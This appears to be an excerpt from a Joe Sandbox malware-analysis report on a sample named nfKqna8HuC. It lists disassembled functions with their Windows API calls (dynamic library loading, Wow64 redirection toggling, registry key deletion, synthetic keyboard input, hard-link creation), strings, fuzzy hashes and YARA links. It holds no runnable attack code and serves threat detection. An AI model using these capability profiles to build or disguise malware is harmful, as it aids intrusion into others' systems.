Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: a4fc3bdf2787d8b63bcbaa88b0147c43a4f76b28bb9616d5116e7f90ca60c92d
Instruction ID: a4822092a7124dccecb588718d79ac3833cdc37d1274b16306138106911fb884
Opcode Fuzzy Hash: a4fc3bdf2787d8b63bcbaa88b0147c43a4f76b28bb9616d5116e7f90ca60c92d
Instruction Fuzzy Hash: 68E0B670649341ABEB216FE1ED4DB843B67B70570AF112414F20ADA5B0CBF86891CF14

Function 0069AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0069AC60
__swprintf.LIBCMT ref: 0069AC94

Strings

WIN_XPe, xrefs: 0069ACD3
%.3d, xrefs: 0069AC6E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: f1298be93cea39ad663e9b5312dff5aa420643346f385217f1bbe31ab1a4c4ec
Instruction ID: c6ecc8059ea2a97261c44e90f467277117df8713045ac4be90660ff6f96e1c34
Opcode Fuzzy Hash: f1298be93cea39ad663e9b5312dff5aa420643346f385217f1bbe31ab1a4c4ec
Instruction Fuzzy Hash: DAE012B1C04618DBCF5097D0DD09EF973FFA704741F100493B906A5900D6359B86EA56

Function 00682205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,006821FB,?,006823EF), ref: 00682213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00682225

Strings

kernel32.dll, xrefs: 0068220E
GetProcessId, xrefs: 0068221F

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 847b9232a6b44576cc6e38f12b00ed460579d34deee15ab51021648fa9c3c5a4
Instruction ID: 95f3558cf9ddac685a8d17730b3d1941b3e42cd5d6b0d643a2fa3a52faff263d
Opcode Fuzzy Hash: 847b9232a6b44576cc6e38f12b00ed460579d34deee15ab51021648fa9c3c5a4
Instruction Fuzzy Hash: F1D0A7B48107139FC7216F70F828641B7D7EF0A300B01551AE846E2750DB70EC808B50

Function 006242F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,006242EC,?,006242AA,?), ref: 00624304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00624316

Strings

Wow64RevertWow64FsRedirection, xrefs: 00624310
kernel32.dll, xrefs: 006242FF

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 790edc342499075807790fa44d64fd4a52cb9cee205711273292228d9ced734d
Instruction ID: f381d9880d02ec616fa6e2418a9871bf64ca72b3a1886377faf0787910a6a81d
Opcode Fuzzy Hash: 790edc342499075807790fa44d64fd4a52cb9cee205711273292228d9ced734d
Instruction Fuzzy Hash: 03D0A770800B239FC7309F61F80C64577D6AF15301B01441AE447D2760EBB0DC808E10

Function 0062434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,006241BB,00624341,?,0062422F,?,006241BB,?,?,?,?,006239FE,?,00000001), ref: 00624359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0062436B

Strings

kernel32.dll, xrefs: 00624354
Wow64DisableWow64FsRedirection, xrefs: 00624365

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: e2f3d6624d541852ad71bd7434a64c18d43b51c195e24ed23de6a6a08679483f
Instruction ID: 7c2b3bcc4622f19d3b7b6a991eb58fb00ff0a7bd1c5c59d5b25ce03d63b66222
Opcode Fuzzy Hash: e2f3d6624d541852ad71bd7434a64c18d43b51c195e24ed23de6a6a08679483f
Instruction Fuzzy Hash: 18D0A770C04B23DFC7209F71F80864177D6AF25725B01451AE492D2750EBB0EC808E10

Function 00660564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0066052F,?,006606D7), ref: 00660572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00660584

Strings

UnRegisterTypeLibForUser, xrefs: 0066057E
oleaut32.dll, xrefs: 0066056D

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 0f2bbf2490ba27762006ddae78714d00294ea5c4c02e4ac8bbe55fcc247b6776
Instruction ID: 99d3d62cf5ed153e9a11b4f809ba25162ae06eb6865608e22ace0994a2ed1916
Opcode Fuzzy Hash: 0f2bbf2490ba27762006ddae78714d00294ea5c4c02e4ac8bbe55fcc247b6776
Instruction Fuzzy Hash: 7CD0A730850323AFD7206F70E808B4377E7AB15300B11882FE843D2750D770D8C08E20

Function 00660539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,0066051D,?,006605FE), ref: 00660547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00660559

Strings

RegisterTypeLibForUser, xrefs: 00660553
oleaut32.dll, xrefs: 00660542

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: eabc49dd6d1a5e8b42830f5b59a8316bcb2e304ff0dd2deb1e9d39a37ff2463a
Instruction ID: ebd959044b1736e80e248e56dcb631f819bc8460f2adb3a453a08f28a6f3155d
Opcode Fuzzy Hash: eabc49dd6d1a5e8b42830f5b59a8316bcb2e304ff0dd2deb1e9d39a37ff2463a
Instruction Fuzzy Hash: 61D0A7308507139FD7209F61E80864676E6AB11301B11C82EE447D2760D670DC808E10

Function 0067ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0067ECBE,?,0067EBBB), ref: 0067ECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0067ECE8

Strings

GetSystemWow64DirectoryW, xrefs: 0067ECE2
kernel32.dll, xrefs: 0067ECD1

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 151858f361ca49ec40f78c816e4e4179d5c6aab4e08e824dab7ce67640a422c4
Instruction ID: 4c4d6bdd27c2a6b74d141cad5eda129b2096ca2114764967195909291377d409
Opcode Fuzzy Hash: 151858f361ca49ec40f78c816e4e4179d5c6aab4e08e824dab7ce67640a422c4
Instruction Fuzzy Hash: 02D0A7758007239FCB216F60E94864277E6AF05300B01C45EF85AD2750DF74DC848E10

Function 0067BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,0067BAD3,00000001,0067B6EE,?,006BDC00), ref: 0067BAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0067BAFD

Strings

GetModuleHandleExW, xrefs: 0067BAF7
kernel32.dll, xrefs: 0067BAE6

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: af8799ed2411e5abdce927b081cd8ad1994949f329b59ff7c240ca3fcb0fb161
Instruction ID: d076fe9df96e078dd7cd78ca4a615ca1a57ca2960cc7ab3fca967bef02033c8b
Opcode Fuzzy Hash: af8799ed2411e5abdce927b081cd8ad1994949f329b59ff7c240ca3fcb0fb161
Instruction Fuzzy Hash: 2BD05E70D107139FC7306F60A848B5176D6AB05700B01941AE847D2750DB70DC80CA10

Function 00683BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00683BD1,?,00683E06), ref: 00683BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00683BFB

Strings

advapi32.dll, xrefs: 00683BE4
RegDeleteKeyExW, xrefs: 00683BF5

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: f54134c22d092d1bbb35d8d6cd66a1e5c6ff4ca30d459a8ca11a7facfd6e6cdc
Instruction ID: 4a457a17143d0043e9102dc273708ddf362d051c47b369a25467fe71d059a60d
Opcode Fuzzy Hash: f54134c22d092d1bbb35d8d6cd66a1e5c6ff4ca30d459a8ca11a7facfd6e6cdc
Instruction Fuzzy Hash: 0BD0A7B08007629FC7207FA0E808643BAF6AF02714B11441AE447E2750DBB0DC808F10

Function 00659B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab7a7f3619fc562244c3513288c650a23df65c21cf4a9c02c07071cb0c8bb3c1
Instruction ID: 857cf23406a753c39f6f18bbe75ba2ee827738c6075b3420faff2ab093d9d80b
Opcode Fuzzy Hash: ab7a7f3619fc562244c3513288c650a23df65c21cf4a9c02c07071cb0c8bb3c1
Instruction Fuzzy Hash: 3DC16C75A0021AEFCB14DF94C885AAEB7B6FF48701F104598ED06EB251D730EE45DBA0

Function 0067AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0067AAB4
CoUninitialize.OLE32 ref: 0067AABF

Part of subcall function 00660213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0066027B

VariantInit.OLEAUT32(?), ref: 0067AACA
VariantClear.OLEAUT32(?), ref: 0067AD9D

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 4150aef959216b4696c53841088b83775c0a5b440a5c0af21dec9fe57c768d7d
Instruction ID: f4e3bb2eb5cbf26be937a315e2c23aaea9959376648443df731c779f979751d7
Opcode Fuzzy Hash: 4150aef959216b4696c53841088b83775c0a5b440a5c0af21dec9fe57c768d7d
Instruction Fuzzy Hash: 7AA14575204B119FCB51EF54C491A5EB7E6BF88710F14844DFA9A9B3A2CB30ED01CB9A

Function 006591CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006591DD
SysAllocString.OLEAUT32(?), ref: 00659286
VariantCopy.OLEAUT32 ref: 006592B5
VariantClear.OLEAUT32(?), ref: 006592DC

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 465fed04cf8d1039710ab3d3614f9ab4297c2a47a29e241039957477283a32df
Instruction ID: 8c86675e60938573f670f334c7588406577a56b29b81e207c5110ddabec90cd3
Opcode Fuzzy Hash: 465fed04cf8d1039710ab3d3614f9ab4297c2a47a29e241039957477283a32df
Instruction Fuzzy Hash: CE51F830604306DBDB60AF65D491A6EB3E7EF49315F20982FE946CB2D1DB349849CB25

Function 0068C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(01287F88,?), ref: 0068C544
ScreenToClient.USER32(?,00000002), ref: 0068C574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0068C5DA

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 9d58792fc932b8d157a2e99b4f47ab38273ebc1e36d13b33b0a1fcd33b549d5a
Instruction ID: cfc2975f7b6dc453bb7218d71e1196a22d41a50809940c26c5d0145c3106d0a3
Opcode Fuzzy Hash: 9d58792fc932b8d157a2e99b4f47ab38273ebc1e36d13b33b0a1fcd33b549d5a
Instruction Fuzzy Hash: 0B512C75900205EFCF20EF68C880AAE7BB7EB55320F109669F9559B291D770ED91CBA0

Function 0065C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0065C462
__itow.LIBCMT ref: 0065C49C

Part of subcall function 0065C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0065C753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0065C505
__itow.LIBCMT ref: 0065C55A

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: b35b678ec294a5b3c1f31013629437b9cf8209217026fd812d455ac575dced9e
Instruction ID: eaa38b83d11b9355b776d94755fe78e7915199920bffb434df8906c32e307746
Opcode Fuzzy Hash: b35b678ec294a5b3c1f31013629437b9cf8209217026fd812d455ac575dced9e
Instruction Fuzzy Hash: 5741E170A00718AFDF20EF54D855FEE7BBAAF49721F000019F906A7281DB709A598FA5

Function 0066390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00663966
SetKeyboardState.USER32(00000080,?,00000001), ref: 00663982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 006639EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00663A4D

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 62a9faabb35aa5ef2a80b710101c54b09a7c3079856e90cf181dd5157a50a886
Instruction ID: 55f56a7b2550e7e6f3273d531d44b8e134ef3a29136e8a261b1394acd78cb959
Opcode Fuzzy Hash: 62a9faabb35aa5ef2a80b710101c54b09a7c3079856e90cf181dd5157a50a886
Instruction Fuzzy Hash: D7410770E04668AAEF208B648815BFDBBB7AF55310F04025AF4C2963C1DBB49E85DF65

Function 0066E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0066E742
GetLastError.KERNEL32(?,00000000), ref: 0066E768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0066E78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0066E7B9

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: d4d648443ae3e5d61e796db9b70e9e1cc9f8c303919eed8663e4a4b3d845956b
Instruction ID: 388e50078801809bc1bf820f7be845b382e580bcac7833804d4d28272d06652a
Opcode Fuzzy Hash: d4d648443ae3e5d61e796db9b70e9e1cc9f8c303919eed8663e4a4b3d845956b
Instruction Fuzzy Hash: 29410339600A11DFCF11EF15C444A4DBBE6AF99710F198498E946AB3A2CB31FD01CF99

Function 0068B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0068B5D1

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 47b92b870a6dc1fcb66cba10ba836e647e68fd679df5bd75f95262dbfb98ee6e
Instruction ID: 40730779a1c8dbeaeea15c7ca6e487358f560350a4de9a5d245ec46b15520666
Opcode Fuzzy Hash: 47b92b870a6dc1fcb66cba10ba836e647e68fd679df5bd75f95262dbfb98ee6e
Instruction Fuzzy Hash: 2A31BE74601204BFEF30BF18CC85FE87B67AB06310F546311FA52D62E2E770A9819B56

Function 0068D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0068D807
GetWindowRect.USER32(?,?), ref: 0068D87D
PtInRect.USER32(?,?,0068ED5A), ref: 0068D88D
MessageBeep.USER32(00000000), ref: 0068D8FE

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
